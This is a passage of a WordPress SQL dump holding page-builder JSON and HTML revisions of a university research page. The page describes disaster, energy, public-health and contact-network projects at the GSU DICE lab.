5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:43:34','2023-09-29 14:43:34','',438,'https://gsudice.dataconn.net/?p=1509',0,'revision','',0),(1510,1,'2023-09-29 10:43:34','2023-09-29 14:43:34','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:43:34','2023-09-29 14:43:34','',126,'https://gsudice.dataconn.net/?p=1510',0,'revision','',0),(1516,1,'2023-09-29 10:44:09','2023-09-29 14:44:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the 